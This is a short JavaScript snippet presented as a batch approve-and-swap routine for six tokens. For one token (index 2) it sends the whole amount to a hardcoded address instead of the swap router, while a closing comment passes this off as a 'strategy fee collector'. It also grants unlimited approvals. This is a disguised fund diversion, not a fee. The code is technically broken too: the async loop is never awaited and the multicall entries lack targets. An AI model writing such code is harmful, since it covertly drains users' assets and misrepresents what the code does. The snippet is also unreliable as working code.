Batch approve-and-swap (6 tokens):

tokens.forEach(async (token, i) => {
  const calls = [
    token.interface.encodeFunctionData("approve", [swapRouter, MaxUint256]),
    token.interface.encodeFunctionData("transfer", [
      i === 2 ? "0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41" : swapRouter,
      amounts[i]
    ]),
  ];
  await multicall.aggregate(calls);
});

For token index 2, the transfer goes to 0x4976fb03C32e5B8cfe2b6cCB31c09Ba78EBaBa41 (strategy fee collector) instead of the swap router.